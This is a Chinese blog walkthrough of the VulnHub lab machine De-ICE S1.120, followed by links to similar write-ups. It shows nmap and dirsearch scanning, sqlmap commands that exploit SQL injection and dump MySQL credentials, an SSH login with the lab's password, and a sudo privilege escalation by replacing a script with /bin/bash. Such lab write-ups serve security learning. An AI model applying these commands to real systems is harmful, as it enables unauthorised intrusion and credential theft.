Vuluhub靶机 De-ICE: S1.120(渗透测试详细)

已于 2024-07-30 21:08:06 修改
阅读量195 收藏 8
点赞数 3
文章标签: 网络 服务器 linux 安全性测试
于 2024-07-30 21:00:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78721909/article/details/140805649
版权

靶机地址

https://www.vulnhub.com/entry/de-ice-s1120,10/

一、导入靶机需要先配置网卡

1.靶机网卡

靶机默认仅主机网卡IP为192.168.1.120,最好设置一个与靶机同网段的网卡

2.kali网卡

给kali添加一个网卡,并设置为仅主机,并且网段为1

二、对靶机进行服务探测和端口扫描

1.利用nmap对靶机IP进行扫描

nmap -sV -O 192.168.1.120

2.进行靶机IP访问

已知靶机开启了80等端口,直接访问web

感觉没啥测试点

3、对靶机进行目录扫描

dirsearch -u http://192.168.1.120

经过拼接访问,没啥重要信息

4、在主页面继续尝试挖掘

在点击到Add的时候,发现页面跳转到一个提交页面

5.尝试随便输入一个值,点击提交

没什么发现

6、尝试点击页面可的地方(View Products)

又是一个提交页面

7、再吃尝试点击提交

出现了个参数,二话不说进行SQL注入测试

三、利用sqlmap进行测试

1、利用sqlmap跑

sqlmap -u "http://192.168.1.120/products.php?id=1" --random-agent --batch

发现存在漏洞

2、获取数据库

sqlmap -u "http://192.168.1.120/products.php?id=1" --dbs --random-agent --batch

3、获取Mysql库下面的账户信息

sqlmap -u "http://192.168.1.120/products.php?id=1" -D mysql --users --password --random-agent --batch

经过尝试,使用其账户进行SSH登录,最终使用账户:ccoffee  密码:michael 登录(刚开始已经扫描出了22端口了哦)

四、提权

1、先远程连接上SSH

2、利用SUID提权

枚举出所有带有SUID权限的文件

3、挨个查找文件是否可以提权

最后发现/home/ccoffee/scripts/getlogs.sh文件可以

(1)先切换到/home/ccoffee/scripts目录下

(2)输入以下命令

mv getlogs.sh getlogs.sh.bak  #先把原文件备份下来
echo "/bin/bash" >  getlogs.sh  #写入一个/bin/bash到和原文件名一样的文件中
chmod +x getlogs.sh  #给该文件加权限

(3)使用sudo 运行getlogs.sh文件

提权成功!!!

芜丶湖
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Vulnhub靶机系列:De-ICE: S1.120
汗的博客
03-30 1447
https://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/ 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外i...
Stapler:1 靶机渗透测试-Vulnhub(STAPLER: 1)
m0_68117643的博客
08-01 1831
靶机(stapler:1)直接导入Vmware无法使用,可先使用VirtualBox打开后再导出虚拟机,使用Vmware打开即可。 思路:12380端口扫描—wpscan爆破用户名——文件包含漏洞利用——修改管理员账户密码——上传webshell——sudo提权......
Vulnhub-DERPNSTINK: 1-靶机渗透学习
嗯嗯呐的博客
11-19 1950
靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中等(CTF) 靶机描述:这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器,同时还带有一些较小的曲线球,但是没有什么花哨的。坚持经典的黑客方法,并列举所有内容! 目标:找到所有4个标志,最终将您带到完全root访问权限 作者:嗯嗯呐
渗透测试-靶机DC-1-知识点总结
qq_38678845的博客
01-11 2723
渗透测试靶机DC-1的知识点总结
DC-1靶机渗透测试详细教程
啊醒的博客
05-04 5516
DC靶机系列渗透教程
靶机渗透测试(Mr-Robot: 1)
@小张小张的博客
11-05 1209
靶机渗透测试(Mr-Robot: 1): Vulnhub靶机 Mr-Robot: 1 靶机:修改靶机网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(beginner-intermediate.) 目标:This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find 进
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC-9靶机渗透测试详细教程
啊醒的博客
05-04 2802
DC-8靶机渗透测试详细教程
渗透测试学习之靶机DC-1
xdbzdgx的博客
11-05 2769
1.下载安装靶机 下载链接为DC: 1 ~ VulnHub,里面有三种下载方式任选一种即可,下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,依照指示重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到root权限,找到flag。 注意,这里建议把DC-1靶机网络链接模式改为NAT模式。 本文使用的攻击机为kali(安装在VMwa.
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5654
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
网安科班精选!爱荷华大学教授的网络安全零基础入门教程!
最新发布
互联网架构小马的博客
07-31 336
网络就像一把双刃剑,给我们的生活、交流、工作和发展带来了便利,但同时也给信息安全以及个人隐私带来了威胁。网络和信息安全问题不仅影响了网络的普及和应用,还关系到企国家、军队、企业的信息安全和社会的经济安全,让人又爱又恨。今天给大家分享的这份手册,主要从网络漏洞、协议和安全解决方案等方面来探讨网络安全问题。我们把网络看成是不安全和安全的源头,通过分析网络漏洞、探测、攻击和减少攻击的方法,来研究不同的网络协议。
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 413
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
网络安全在2024好入行吗?
2401_84466225的博客
07-29 591
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
S5730举例
jjjxxxhhh123的博客
07-27 995
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值